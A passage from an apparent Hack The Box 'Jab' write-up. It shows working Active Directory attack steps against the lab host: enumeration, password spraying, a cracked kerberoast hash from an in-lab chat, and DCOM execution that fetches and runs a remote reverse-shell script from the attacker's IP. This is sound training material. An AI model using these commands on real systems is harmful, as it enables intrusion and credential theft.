SMB         10.10.11.4   445    DC01             1177: JAB\Merch App Read (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1178: JAB\Shared Calendar Admin (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1179: JAB\Shared Calendar RW (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1180: JAB\Shared Calendar Read (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1181: JAB\VPN Users  (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1182: JAB\Interns (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1183: JAB\Website Admin (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1184: JAB\Barracuda_all_access (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1185: JAB\Supervisors Warehouse (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1186: JAB\QA_users (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1187: JAB\Calendar Access (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1188: JAB\Nars360_users (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1189: JAB\Finance_billing_ilfreight (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1190: JAB\Nas Group (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1191: JAB\Front Desk (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1192: JAB\Billing (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1193: JAB\Finance_old (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1194: JAB\Barracuda_facebook_access (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1195: JAB\Barracuda_parked_sites (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1196: JAB\Barracuda_youtube_exempt (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1197: JAB\Rackspace_vpn_access (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1198: JAB\Collaboration_users (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1199: JAB\Ehr_group (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1200: JAB\Msp_users (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1201: JAB\Billing_users (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1202: JAB\Frontoffice_users (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1203: JAB\Executive_users (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1204: JAB\Communications_users (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1205: JAB\Facilities_users (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1206: JAB\Finance_mgt (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1207: JAB\Development_users (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1208: JAB\SQL Admins (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1209: JAB\SQL Dev (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1210: JAB\SQL QA (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1211: JAB\SQL Servers (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1212: JAB\IT Security (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1213: JAB\Network Ops (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1214: JAB\Secadmins (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1215: JAB\Temp Employees (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1216: JAB\MSSP Connect (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1217: JAB\SQL01$ (SidTypeUser)
SMB         10.10.11.4   445    DC01             1218: JAB\ILF-XRG$ (SidTypeUser)
SMB         10.10.11.4   445    DC01             1219: JAB\MAINLON$ (SidTypeUser)
SMB         10.10.11.4   445    DC01             1220: JAB\CISERVER$ (SidTypeUser)
SMB         10.10.11.4   445    DC01             1221: JAB\INDEX-DEV-LON$ (SidTypeUser)
[--SNIP--]
```

There are way too many users and groups to look into.  
I also check a few other modules:

```console
root@dc3c918ab8f5:~# nxc smb 10.10.11.4 -d jab.htb -u 'jmontgomery' -p 'Midnight_121' -M enum_av
SMB         10.10.11.4   445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.4   445    DC01             [+] jab.htb\jmontgomery:Midnight_121 
ENUM_AV     10.10.11.4   445    DC01             Found NOTHING!

root@dc3c918ab8f5:~# nxc ldap 10.10.11.4 -d jab.htb -u 'jmontgomery' -p 'Midnight_121' -M adcs
SMB         10.10.11.4   445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.4   636    DC01             [+] jab.htb\jmontgomery:Midnight_121 
ADCS        10.10.11.4   389    DC01             [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS                                                Found PKI Enrollment Server: DC01.jab.htb
ADCS                                                Found CN: jab-DC01-CA

root@dc3c918ab8f5:~# nxc ldap 10.10.11.4 -d jab.htb -u 'jmontgomery' -p 'Midnight_121' -M maq
SMB         10.10.11.4   445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.4   636    DC01             [+] jab.htb\jmontgomery:Midnight_121 
MAQ         10.10.11.4   389    DC01             [*] Getting the MachineAccountQuota
MAQ         10.10.11.4   389    DC01             MachineAccountQuota: 0

root@dc3c918ab8f5:~# nxc ldap 10.10.11.4 -d jab.htb -u 'jmontgomery' -p 'Midnight_121' -M whoami
SMB         10.10.11.4   445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.4   636    DC01             [+] jab.htb\jmontgomery:Midnight_121 
WHOAMI      10.10.11.4   389    DC01             distinguishedName: CN=Joyce Montgomery,OU=Server Admin,OU=IT,OU=Corp,DC=jab,DC=htb
WHOAMI      10.10.11.4   389    DC01             Member of: CN=Contractors,OU=Security Groups,OU=Corp,DC=jab,DC=htb
WHOAMI      10.10.11.4   389    DC01             name: Joyce Montgomery
WHOAMI      10.10.11.4   389    DC01             Last logon: 133534512945298051
WHOAMI      10.10.11.4   389    DC01             pwdLastSet: 133492000755121222
WHOAMI      10.10.11.4   389    DC01             logonCount: 7
WHOAMI      10.10.11.4   389    DC01             sAMAccountName: jmontgomery
```

And some groups:

```console
root@dc3c918ab8f5:~# nxc ldap 10.10.11.4 -d jab.htb -u 'jmontgomery' -p 'Midnight_121' -M group-mem -o group='Remote Management Users'
SMB         10.10.11.4   445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.4   636    DC01             [+] jab.htb\jmontgomery:Midnight_121 

root@dc3c918ab8f5:~# nxc ldap 10.10.11.4 -d jab.htb -u 'jmontgomery' -p 'Midnight_121' -M group-mem -o group='Remote Desktop Users'
SMB         10.10.11.4   445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.4   636    DC01             [+] jab.htb\jmontgomery:Midnight_121 

root@dc3c918ab8f5:~# nxc ldap 10.10.11.4 -d jab.htb -u 'jmontgomery' -p 'Midnight_121' -M group-mem -o group='Domain Admins'
SMB         10.10.11.4   445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.4   636    DC01             [+] jab.htb\jmontgomery:Midnight_121 
GROUP-ME... 10.10.11.4   389    DC01             [+] Found the following members of the Domain Admins group:
GROUP-ME... 10.10.11.4   389    DC01             Administrator

root@dc3c918ab8f5:~# nxc ldap 10.10.11.4 -d jab.htb -u 'jmontgomery' -p 'Midnight_121' -M group-mem -o group='Protected Users'
SMB         10.10.11.4   445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.4   636    DC01             [+] jab.htb\jmontgomery:Midnight_121 

root@dc3c918ab8f5:~# nxc ldap 10.10.11.4 -d jab.htb -u 'jmontgomery' -p 'Midnight_121' -M group-mem -o group='Domain Computers'
SMB         10.10.11.4   445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.4   636    DC01             [+] jab.htb\jmontgomery:Midnight_121 
GROUP-ME... 10.10.11.4   389    DC01             [+] Found the following members of the Domain Computers group:
GROUP-ME... 10.10.11.4   389    DC01             SQL01$
GROUP-ME... 10.10.11.4   389    DC01             ILF-XRG$
GROUP-ME... 10.10.11.4   389    DC01             MAINLON$
GROUP-ME... 10.10.11.4   389    DC01             CISERVER$
GROUP-ME... 10.10.11.4   389    DC01             INDEX-DEV-LON$
GROUP-ME... 10.10.11.4   389    DC01             SQL-0253$
GROUP-ME... 10.10.11.4   389    DC01             NYC-0615$
[--SNIP--]
GROUP-ME... 10.10.11.4   389    DC01             NYC-0623$
GROUP-ME... 10.10.11.4   389    DC01             LON-0455$
[--SNIP--]
GROUP-ME... 10.10.11.4   389    DC01             LON-0471$
GROUP-ME... 10.10.11.4   389    DC01             HK-0506$
[--SNIP--]
GROUP-ME... 10.10.11.4   389    DC01             HK-0524$
GROUP-ME... 10.10.11.4   389    DC01             ILFOWA$
GROUP-ME... 10.10.11.4   389    DC01             NYC-FS01$
GROUP-ME... 10.10.11.4   389    DC01             JIM-PC$
GROUP-ME... 10.10.11.4   389    DC01             SARAH-PC$
GROUP-ME... 10.10.11.4   389    DC01             KIOSK-PC$
GROUP-ME... 10.10.11.4   389    DC01             CEO-PC$
GROUP-ME... 10.10.11.4   389    DC01             CTO-PC$
GROUP-ME... 10.10.11.4   389    DC01             CIO-PC$
GROUP-ME... 10.10.11.4   389    DC01             CFO-PC$
GROUP-ME... 10.10.11.4   389    DC01             FRONTDESK$
GROUP-ME... 10.10.11.4   389    DC01             SQL-TEST$
GROUP-ME... 10.10.11.4   389    DC01             SQL-DEV$
GROUP-ME... 10.10.11.4   389    DC01             SQL-ACC$
GROUP-ME... 10.10.11.4   389    DC01             SQL-STAGE$
GROUP-ME... 10.10.11.4   389    DC01             SQL-PROD01$
[--SNIP--]
GROUP-ME... 10.10.11.4   389    DC01             SQL-PROD06$
GROUP-ME... 10.10.11.4   389    DC01             SQL-SERVER$
GROUP-ME... 10.10.11.4   389    DC01             SALESDB$
GROUP-ME... 10.10.11.4   389    DC01             ASSETDB$
GROUP-ME... 10.10.11.4   389    DC01             TENETDB$
GROUP-ME... 10.10.11.4   389    DC01             LONVCENTER$
GROUP-ME... 10.10.11.4   389    DC01             NYCVCENTER$
GROUP-ME... 10.10.11.4   389    DC01             HKVCENTER$
GROUP-ME... 10.10.11.4   389    DC01             ORCL-2020$
[--SNIP--]
GROUP-ME... 10.10.11.4   389    DC01             ORCL-2027$
GROUP-ME... 10.10.11.4   389    DC01             LPTP-0100$
[--SNIP--]
GROUP-ME... 10.10.11.4   389    DC01             LPTP-0213$
GROUP-ME... 10.10.11.4   389    DC01             TMA-SRV1$
[--SNIP--]
GROUP-ME... 10.10.11.4   389    DC01             TMA-SRV53$
GROUP-ME... 10.10.11.4   389    DC01             ILF-SRV-100$
[--SNIP--]
GROUP-ME... 10.10.11.4   389    DC01             ILF-SRV-131$
GROUP-ME... 10.10.11.4   389    DC01             LAX-0883$
[--SNIP--]
GROUP-ME... 10.10.11.4   389    DC01             LAX-0913$
GROUP-ME... 10.10.11.4   389    DC01             LON-0701$
[--SNIP--]
GROUP-ME... 10.10.11.4   389    DC01             LON-0745$
GROUP-ME... 10.10.11.4   389    DC01             HK-0601$
[--SNIP--]
GROUP-ME... 10.10.11.4   389    DC01             HK-0659$
GROUP-ME... 10.10.11.4   389    DC01             GUARD-LON01$
GROUP-ME... 10.10.11.4   389    DC01             GUARD-LON02$
GROUP-ME... 10.10.11.4   389    DC01             GUARD-LON03$
GROUP-ME... 10.10.11.4   389    DC01             GUARD-HK01$
GROUP-ME... 10.10.11.4   389    DC01             GUARD-HK02$
GROUP-ME... 10.10.11.4   389    DC01             GUARD-HK03$
GROUP-ME... 10.10.11.4   389    DC01             GUARD-LAX01$
GROUP-ME... 10.10.11.4   389    DC01             GUARD-LAX02$
GROUP-ME... 10.10.11.4   389    DC01             GUARD-LAX03$
GROUP-ME... 10.10.11.4   389    DC01             WHS01-SUPR$
GROUP-ME... 10.10.11.4   389    DC01             WHS0009$
[--SNIP--]
GROUP-ME... 10.10.11.4   389    DC01             WHS0040$
GROUP-ME... 10.10.11.4   389    DC01             PRINT001$
[--SNIP--]
GROUP-ME... 10.10.11.4   389    DC01             PRINT015$
GROUP-ME... 10.10.11.4   389    DC01             SCCM-01$
[--SNIP--]
GROUP-ME... 10.10.11.4   389    DC01             SCCM-07$
GROUP-ME... 10.10.11.4   389    DC01             WSUS-01$
[--SNIP--]
GROUP-ME... 10.10.11.4   389    DC01             WSUS-05$
GROUP-ME... 10.10.11.4   389    DC01             WEB-0001$
[--SNIP--]
GROUP-ME... 10.10.11.4   389    DC01             WEB-0012$
```

There are too many machine accounts, and the valuable groups are empty.  
I also collected bloodhound data:

```console
root@dc3c918ab8f5:~# python3 -m pip install pycryptodome
root@dc3c918ab8f5:~# nxc ldap 10.10.11.4 -d jab.htb -u 'jmontgomery' -p 'Midnight_121' --bloodhound -ns 10.10.11.4 -c All
SMB         10.10.11.4   445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.4   636    DC01             [+] jab.htb\jmontgomery:Midnight_121 
LDAPS       10.10.11.4   636    DC01             Resolved collection methods: trusts, container, rdp, localadmin, psremote, objectprops, session, acl, group, dcom
LDAP        10.10.11.4   389    DC01             Done in 03M 33S
LDAPS       10.10.11.4   636    DC01             Compressing output into /root/.nxc/logs/DC01_10.10.11.4_2024-02-26_211109bloodhound.zip
```

Get the file out of the container with:

```console
opcode@debian$ docker cp netexec:/root/.nxc/logs/DC01_10.10.11.4_2024-02-26_211109bloodhound.zip ~/
```

Start neo4j:

```console
opcode@debian$ sudo neo4j console
```

Finally, we can run the BloodHound binary:

```console
opcode@debian$ ./BloodHound --in-process-gpu
```

I marked `jmontgomery` as owned and ran all default queries.  
I learnt that `jmontgomery` is in the `SERVER ADMIN` OU. Besides that, I did not find anything relevant for privilege escalation.

However, I learnt that `svc_openfire` is a member of the `Distributed COM Users` local group on the computer `DC01`. It can allow code execution under certain conditions by instantiating a COM object on a remote machine and invoking its methods.  
Therefore, I marked `svc_openfire` as high value.

I also tried spraying his password across other accounts:

```console
opcode@debian$ kerbrute passwordspray --dc 10.10.11.4 -d jab.htb ~/users.txt 'Midnight_121'

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 02/27/24 - Ronnie Flathers @ropnop

2024/02/27 03:50:15 >  Using KDC(s):
2024/02/27 03:50:15 >   10.10.11.4:88

2024/02/27 03:51:31 >  [+] VALID LOGIN:  jmontgomery@jab.htb:Midnight_121
2024/02/27 03:51:59 >  Done! Tested 2686 logins (1 successes) in 103.666 seconds
```

But no success.

With all options exhausted, I went back to XMPP.  
I uninstalled `pidgin`, and used `profanity` this time. It's much more fun to use.

```console
opcode@debian$ sudo apt remove pidgin
opcode@debian$ sudo apt autoremove
opcode@debian$ sudo rm -r ~/.purple
```

Installing and using `profanity`:

```console
opcode@debian$ sudo apt install profanity
opcode@debian$ profanity
```

```console
/account add jmontgomery
/account set jmontgomery jid jmontgomery@jab.htb
/connect jmontgomery@jab.htb
Password: Midnight_121
/tls always
```

`/rooms` can be used to obtain a list of rooms:

```console
04:12:13 - Room list request sent: conference.jab.htb
04:12:13 -
04:12:13 - Rooms list response received: conference.jab.htb
04:12:13 -   test@conference.jab.htb (test)
04:12:13 -   pentest2003@conference.jab.htb (2003 Third Party Pentest Discussion)
04:12:13 -   test2@conference.jab.htb (test2)
```

`pentest2003` is a fresh addition.

```console
/join pentest2003@conference.jab.htb
```

I was able to join the room and access the conversation:

```console
04:14:04 ! -> You have joined the room as jmontgomery, role: participant, affiliation: member                                                                      Moderators
------------------------------------------------------------------------------------------------------------------------------------------------------------------ Participants
00:01:13 - adunn: team, we need to finalize post-remediation testing from last quarter's pentest. @bdavis Brian can you please provide us with a status?             jmontgomery
00:03:58 - bdavis: sure. we removed the SPN from the svc_openfire account. I believe this was finding #2. can someone from the security team test this? if not we  Visitors
           can send it back to the pentesters to validate.
01:00:41 - bdavis: here are the commands from the report, can you find someone from the security team who can re-run these to validate?
01:00:43 - bdavis: $ GetUserSPNs.py -request -dc-ip 192.168.195.129 jab.htb/hthompson

           Impacket v0.9.25.dev1+20221216.150032.204c5b6b - Copyright 2021 SecureAuth Corporation

           Password:
           ServicePrincipalName  Name          MemberOf  PasswordLastSet             LastLogon  Delegation
           --------------------  ------------  --------  --------------------------  ---------  ----------
           http/xmpp.jab.local   svc_openfire            2023-10-27 15:23:49.811611  <never>



           [-] CCache file is not found. Skipping...
           $krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openfire*$b1abbb2f4beb2a48e7412ccd26b60e61$864f27ddaaded607ab5efa59544870cece4b6262e20f3bee38408d296ffbf0
           7ceb421188b9b82ac0037ae67b488bb0ef2178a0792d62<SNIP>

01:00:56 - bdavis: $ hashcat -m 13100 svc_openfire_tgs /usr/share/wordlists/rockyou.txt

           hashcat (v6.1.1) starting...

           <SNIP>

           $krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openfire*$de17a01e2449626571bd9416dd4e3d46$4fea18693e1cb97f3e096288a76204437f115fe49b9611e339154e0effb1d0
           fcccfbbbb219da829b0ac70e8420f2f35a4f315c5c6f1d4ad3092e14ccd506e9a3bd3d20854ec73e62859cd68a7e6169f3c0b5ab82064b04df4ff7583ef18bbd42ac529a5747102c2924d1a
           76703a30908f5ad41423b2fff5e6c03d3df6c0635a41bea1aca3e15986639c758eef30b74498a184380411e207e5f3afef185eaf605f543c436cd155823b7a7870a3d5acd0b785f999facd8
           b7ffdafe6e0410af26efc42417d402f2819d03b3730203b59c21b0434e2e0e7a97ed09e3901f523ba52fe9d3ee7f4203de9e857761fbcb417d047765a5a01e71aff732e5d5d114f0b58a8a0
           df4ca7e1ff5a88c532f5cf33f2e01986ac44a353c0142b0360e1b839bb6889a54fbd9c549da23fb05193a4bfba179336e7dd69380bc4f9c3c00324e42043ee54b3017a913f84a20894e145b
           23b440aff9c524efb7957dee89b1e7b735db292ca5cb32cf024e9b8f5546c33caa36f5370db61a9a3facb473e741c61ec7dbee7420c188e31b0d920f06b7ffc1cb86ace5db0f9eeaf8c13bc
           ca743b6bf8b2ece99dd58aff354f5b4a78ffcd9ad69ad8e7812a2952806feb9b411fe53774f92f9e8889380dddcb59de09320094b751a0c938ecc762cbd5d57d4e0c3d660e88545cc96e324
           b7ffdafe6e0410af26efc42417d402f2819d03b3730203b59c21b0434e2e0e7a97ed09e3901f523ba52fe9d3ee7f4203de9e857761fbcb417d047765a5a01e71aff732e5d5d114f0b58a8a0 Moderators
           df4ca7e1ff5a88c532f5cf33f2e01986ac44a353c0142b0360e1b839bb6889a54fbd9c549da23fb05193a4bfba179336e7dd69380bc4f9c3c00324e42043ee54b3017a913f84a20894e145b Participants
           23b440aff9c524efb7957dee89b1e7b735db292ca5cb32cf024e9b8f5546c33caa36f5370db61a9a3facb473e741c61ec7dbee7420c188e31b0d920f06b7ffc1cb86ace5db0f9eeaf8c13bc   jmontgomery
           ca743b6bf8b2ece99dd58aff354f5b4a78ffcd9ad69ad8e7812a2952806feb9b411fe53774f92f9e8889380dddcb59de09320094b751a0c938ecc762cbd5d57d4e0c3d660e88545cc96e324 Visitors
           a6fef226bc62e2bb31897670929571cd728b43647c03e44867b148428c9dc917f1dc4a0331517b65aa52221fcfe9499017ab4e6216ced3db5837d10ad0d15e07679b56c6a68a97c1e851238
           cef84a78754ff5c08d31895f0066b727449575a1187b19ad8604d583ae07694238bae2d4839fb20830f77fffb39f9d6a38c1c0d524130a6307125509422498f6c64adc030bfcf616c4c0d3e
           0fa76dcde0dfc5c94a4cb07ccf4cac941755cfdd1ed94e37d90bd1b612fee2ced175aa0e01f2919e31614f72c1ff7316be4ee71e80e0626b787c9f017504fa717b03c94f38fe9d682542d3d
           7edaff777a8b2d3163bc83c5143dc680c7819f405ec207b7bec51dabcec4896e110eb4ed0273dd26c82fc54bb2b5a1294cb7f3b654a13b4530bc186ff7fe3ab5a802c7c91e664144f92f438
           aecf9f814f73ed556dac403daaefcc7081957177d16c1087f058323f7aa3dfecfa024cc842aa3c8ef82213ad4acb89b88fc7d1f68338e8127644cfe101bf93b18ec0da457c9136e3d0efa0d
           094994e1591ecc4:!@#$%^&*(1qazxsw

           Session..........: hashcat
           Status...........: Cracked
           Hash.Name........: Kerberos 5, etype 23, TGS-REP
           Hash.Target......: $krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openf...91ecc4
           Time.Started.....: Fri Oct 27 15:30:12 2023 (17 secs)
           Time.Estimated...: Fri Oct 27 15:30:29 2023 (0 secs)
           Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
           Guess.Queue......: 1/1 (100.00%)
           Speed.#1.........:   873.9 kH/s (10.16ms) @ Accel:64 Loops:1 Thr:64 Vec:8
           Recovered........: 1/1 (100.00%) Digests
           Progress.........: 14344385/14344385 (100.00%)
           Rejected.........: 0/14344385 (0.00%)
           Restore.Point....: 14336000/14344385 (99.94%)
           Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
           Candidates.#1....: $HEX[2321686f74746965] -> $HEX[042a0337c2a156616d6f732103]

           Started: Fri Oct 27 15:30:09 2023
           Stopped: Fri Oct 27 15:30:29 2023

01:01:57 - adunn: I'll pass this along and circle back with the group
01:02:23 - bdavis: perfect, thanks Angela!
04:14:04 ! Room subject cleared
```

It seems that the account `svc_openfire` previously had an SPN associated with it, making it kerberoastable.  
The SPN is no longer there, but we can check if the password `!@#$%^&*(1qazxsw` was updated:

```console
opcode@debian$ kerbrute passwordspray --dc 10.10.11.4 -d jab.htb ~/users.txt '!@#$%^&*(1qazxsw'
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 02/27/24 - Ronnie Flathers @ropnop

2024/02/27 04:21:01 >  Using KDC(s):
2024/02/27 04:21:01 >   10.10.11.4:88

2024/02/27 04:21:32 >  [+] VALID LOGIN:  svc_openfire@jab.htb:!@#$%^&*(1qazxsw
2024/02/27 04:23:04 >  Done! Tested 2686 logins (1 successes) in 122.868 seconds
```

It is still valid!  
I'd first check XMPP:

```console
opcode@debian$ profanity
```

```console
/account add svc_openfire
/account set svc_openfire jid svc_openfire@jab.htb
/connect svc_openfire@jab.htb
Password: !@#$%^&*(1qazxsw
```

Then, I used `/rooms`:

```console
06:00:06 - Rooms list response received: conference.jab.htb
06:00:06 -   test@conference.jab.htb (test)
06:00:06 -   test2@conference.jab.htb (test2)
```

Nothing useful there.  
I'd also check a couple NXC commands:

```console
root@dc3c918ab8f5:~# nxc smb 10.10.11.4 -d jab.htb -u 'svc_openfire' -p '!@#$%^&*(1qazxsw' --shares
SMB         10.10.11.4   445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.4   445    DC01             [+] jab.htb\svc_openfire:!@#$%^&*(1qazxsw 
SMB         10.10.11.4   445    DC01             [*] Enumerated shares
SMB         10.10.11.4   445    DC01             Share           Permissions     Remark
SMB         10.10.11.4   445    DC01             -----           -----------     ------
SMB         10.10.11.4   445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.4   445    DC01             C$                              Default share
SMB         10.10.11.4   445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.4   445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.4   445    DC01             SYSVOL          READ            Logon server share 

root@dc3c918ab8f5:~# nxc ldap 10.10.11.4 -d jab.htb -u 'svc_openfire' -p '!@#$%^&*(1qazxsw' -M whoami
SMB         10.10.11.4   445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.4   636    DC01             [+] jab.htb\svc_openfire:!@#$%^&*(1qazxsw 
WHOAMI      10.10.11.4   389    DC01             distinguishedName: CN=svc_openfire,OU=Service Accounts,OU=IT,OU=Corp,DC=jab,DC=htb
WHOAMI      10.10.11.4   389    DC01             Member of: CN=Distributed COM Users,CN=Builtin,DC=jab,DC=htb
WHOAMI      10.10.11.4   389    DC01             name: svc_openfire
WHOAMI      10.10.11.4   389    DC01             Enabled: Yes
WHOAMI      10.10.11.4   389    DC01             Password Never Expires: Yes
WHOAMI      10.10.11.4   389    DC01             Last logon: 133534614909196636
WHOAMI      10.10.11.4   389    DC01             pwdLastSet: 133504221295722663
WHOAMI      10.10.11.4   389    DC01             logonCount: 3
WHOAMI      10.10.11.4   389    DC01             sAMAccountName: svc_openfire
```

We have already learnt about DCOM from Bloodhound.  
It can allow code execution by instantiating a COM object on a remote machine and invoking its methods.  
I tried running `dcomexec.py`, but it returned an error with `ShellWindows` and `ShellBrowserWindow` DCOM objects.  
`MMC20` did not return an error but got stuck. So I tried to ping myself with `-silentcommand`

```console
opcode@debian$ dcomexec.py -silentcommand -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@DC01.jab.htb 'ping 10.10.14.31'
```

It worked, and I received ICMP packets.  
I tried using `ConPtyShell` to get a shell, but it did not work. I had to use the [shell_wstderr.ps1](shell_wstderr.ps1) which I had modified for [Stealth](https://gitlab.com/0pcode/thm-scribbles/-/blob/main/Stealth/README.md#adding-stderr-support-to-the-reverse-shell):

```console
opcode@debian$ dcomexec.py -silentcommand -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@DC01.jab.htb 'powershell.exe IEX(IWR http://10.10.14.31:8000/shell_wstderr.ps1 -UseBasicParsing)'
```

```console
C:\windows\system32> whoami
jab\svc_openfire
```

## Post-shell AD enumeration

```console
C:\> whoami /all

USER INFORMATION
----------------

User Name        SID                                         
================ ============================================
jab\svc_openfire S-1-5-21-715914501-2118353807-243417633-1104


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes                                        
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Distributed COM Users               Alias            S-1-5-32-562 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448                                                    


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State  
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
```

Nothing useful here.

```console
C:\> netstat -ano -p TCP | findstr LISTENING
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING       632
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       896
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING       632
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:464            0.0.0.0:0              LISTENING       632
  TCP    0.0.0.0:593            0.0.0.0:0              LISTENING       896
  TCP    0.0.0.0:636            0.0.0.0:0              LISTENING       632
  TCP    0.0.0.0:3268           0.0.0.0:0              LISTENING       632
  TCP    0.0.0.0:3269           0.0.0.0:0              LISTENING       632
  TCP    0.0.0.0:5222           0.0.0.0:0              LISTENING       3308
  TCP    0.0.0.0:5223           0.0.0.0:0              LISTENING       3308
  TCP    0.0.0.0:5262           0.0.0.0:0              LISTENING       3308
  TCP    0.0.0.0:5263           0.0.0.0:0              LISTENING       3308
  TCP    0.0.0.0:5269           0.0.0.0:0              LISTENING       3308
  TCP    0.0.0.0:5270           0.0.0.0:0              LISTENING       3308
  TCP    0.0.0.0:5275           0.0.0.0:0              LISTENING       3308
  TCP    0.0.0.0:5276           0.0.0.0:0              LISTENING       3308
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:7070           0.0.0.0:0              LISTENING       3308
  TCP    0.0.0.0:7443           0.0.0.0:0              LISTENING       3308
  TCP    0.0.0.0:7777           0.0.0.0:0              LISTENING       3308
  TCP    0.0.0.0:9389           0.0.0.0:0              LISTENING       2848
